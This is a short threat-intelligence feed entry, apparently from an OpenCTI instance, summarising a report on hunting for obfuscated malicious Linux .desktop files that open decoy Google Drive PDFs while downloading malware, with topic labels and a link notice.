Actionable threat hunting with Threat Intelligence (I) - Hunting malicious desktop files
NetmanageIT OpenCTI - opencti.netmanageit.com
SUMMARY :
This analysis explores the detection of malicious .desktop files used by threat actors to infect Linux systems. It explains the structure of these files and how they are manipulated to obfuscate malicious content. The report details the execution process of these files, which often involve opening PDF files from Google Drive as a distraction while downloading malware. Various threat hunting techniques are presented, including searching for specific processes, command lines, and file contents. The article provides several Google Threat Intelligence queries for identifying suspicious .desktop files and related malicious activities. It also includes a list of recently discovered samples potentially linked to a campaign reported by Zscaler.
OPENCTI LABELS :
linux,pdf,obfuscation,threat hunting,google drive,xfce,desktop files,kde,google threat intelligence,gnome
Open in NetmanageIT OpenCTI Public Instance with below link!
Use public read only username and password on login page.
NOTE : Use Public READ only user credentials on login page banner.
Actionable threat hunting with Threat Intelligence (I) - Hunting malicious desktop files